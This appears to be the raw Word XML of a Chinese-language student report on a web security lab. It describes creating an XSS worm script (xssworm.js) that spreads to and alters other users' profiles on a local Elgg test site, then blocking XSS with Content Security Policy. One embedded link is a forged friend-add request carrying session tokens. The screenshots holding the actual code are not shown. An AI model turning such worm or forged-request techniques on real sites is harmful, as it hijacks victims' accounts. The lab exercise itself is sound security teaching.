          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在/</w:t>
      </w:r>
      <w:r>
        <w:t>var/www/html/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中建xssworm</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件，写入以下脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B708E" w14:textId="48AD92AB" w:rsidR="00031C0C" w:rsidRDefault="009752E6" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009752E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED173CE" wp14:editId="610640D1">
            <wp:extent cx="5274310" cy="40887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8E9A" w14:textId="131D2F31" w:rsidR="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录Charlie的账号进入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的主页发现自己的信息被修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE606A3" w14:textId="61A82AA4" w:rsidR="009752E6" w:rsidRDefault="009752E6" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009752E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D7A4A15" wp14:editId="0778ED03">
            <wp:extent cx="4572000" cy="14001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BD22" w14:textId="57E3FD8A" w:rsidR="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先删除</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前的信息，再进入Charlie的主页，发现自己的信息又被修改了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506DD790" w14:textId="06155F11" w:rsidR="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D1A399D" wp14:editId="241FC5BD">
            <wp:extent cx="4889500" cy="257302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CB84F" w14:textId="426A88E1" w:rsidR="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 7: Defeating XSS Attacks Using CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C11EA98" w14:textId="4C2BBD31" w:rsidR="009E02CA" w:rsidRPr="009E02CA" w:rsidRDefault="009E02CA" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先在hosts文件中添加如下网址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F45C0" w14:textId="4505E1AF" w:rsidR="00BE22BA" w:rsidRDefault="00AF49CF" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55774F59" wp14:editId="3AE07EE6">
            <wp:extent cx="4602480" cy="3456018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6729" cy="347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CB19" w14:textId="60B8EFAF" w:rsidR="009E02CA" w:rsidRDefault="009E02CA" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在官网下载csp</w:t>
      </w:r>
      <w:r>
        <w:t>.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，解压后打开网页如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFA595" w14:textId="700A3521" w:rsidR="009E02CA" w:rsidRDefault="008358B6" w:rsidP="009E02CA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008358B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4828DF96" wp14:editId="00C295A0">
            <wp:extent cx="5151120" cy="15468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10" b="-1924"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5228829" cy="157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5F268" w14:textId="4ABB63C6" w:rsidR="009E02CA" w:rsidRPr="009E02CA" w:rsidRDefault="009E02CA" w:rsidP="009E02CA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹中的Python文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7474A742" w14:textId="11EF7547" w:rsidR="009E02CA" w:rsidRDefault="009E02CA" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009E02CA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2574DA66" wp14:editId="129FB5F3">
            <wp:extent cx="5274310" cy="26587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F02C" w14:textId="65C2547D" w:rsidR="009E02CA" w:rsidRDefault="009E02CA" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>执行成功后再次打开网页：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF0A3A" w14:textId="4F4343EC" w:rsidR="009E02CA" w:rsidRDefault="008358B6" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008358B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49C3426B" wp14:editId="4B281615">
            <wp:extent cx="5274310" cy="11271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F5B4" w14:textId="01EEBD09" w:rsidR="008358B6" w:rsidRDefault="008358B6" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED6A5A3" w14:textId="4B9D2DDE" w:rsidR="008358B6" w:rsidRDefault="008358B6" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7AA4BA" w14:textId="6B258044" w:rsidR="008358B6" w:rsidRDefault="008358B6" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008358B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>实验感想：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B69064" w14:textId="2D50C0E0" w:rsidR="008358B6" w:rsidRPr="008358B6" w:rsidRDefault="008358B6" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次实验室X</w:t>
      </w:r>
      <w:r>
        <w:t>SS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻防实验，与上次实验的C</w:t>
      </w:r>
      <w:r>
        <w:t>SRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击有着相似之处。但是X</w:t>
      </w:r>
      <w:r>
        <w:t>SS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击可能会在数据中放入Java</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cript代码，如果网络没有将其过滤掉，这段代码可能会在数据中心放入浏览器并被执行。并且这段代码可以自然地与H</w:t>
      </w:r>
      <w:r>
        <w:t>TML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据混合，从而难以发现。一些蠕虫病毒就是这个攻击原理，感染其他用户，从而传播越来越多。所以学习这些攻击的手段对于以后网络安全研究有着重要的意义，也让我从实践中更加体会到这门课的重要性。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008358B6" w:rsidRPr="00835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EA2B8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50D8F60E"/>
    <w:lvl w:ilvl="0" w:tplc="19900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12"/>
    <w:rsid w:val="00031C0C"/>
    <w:rsid w:val="000A49A3"/>
    <w:rsid w:val="001E2399"/>
    <w:rsid w:val="002A15F8"/>
    <w:rsid w:val="002C74D4"/>
    <w:rsid w:val="00490531"/>
    <w:rsid w:val="00554F1E"/>
    <w:rsid w:val="00681EC5"/>
    <w:rsid w:val="006E5E5C"/>
    <w:rsid w:val="00760FCE"/>
    <w:rsid w:val="008358B6"/>
    <w:rsid w:val="008F0438"/>
    <w:rsid w:val="00973E7A"/>
    <w:rsid w:val="009752E6"/>
    <w:rsid w:val="009E02CA"/>
    <w:rsid w:val="00A30605"/>
    <w:rsid w:val="00AF49CF"/>
    <w:rsid w:val="00BE22BA"/>
    <w:rsid w:val="00C849B9"/>
    <w:rsid w:val="00D773D3"/>
    <w:rsid w:val="00DE2512"/>
    <w:rsid w:val="00EE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D3922"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{17B52B36-614E-4367-AD1A-72536092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905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905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A15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15F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81E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hyperlink" Target="http://www.xsslabelgg.com/action/friends/add?friend=47&amp;__elgg_ts=1600220266&amp;__elgg_token=Zg6reNWVV8cNAAUt0S0lpw&amp;__elgg_ts=1600220264&amp;__elgg_token=sXVmDHIw5fWHxrroffFOJA" TargetMode="External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CE9D-FFAB-47EE-A121-A62F39923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3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宸玮</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>顾 宸玮</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-15T11:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-16T09:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>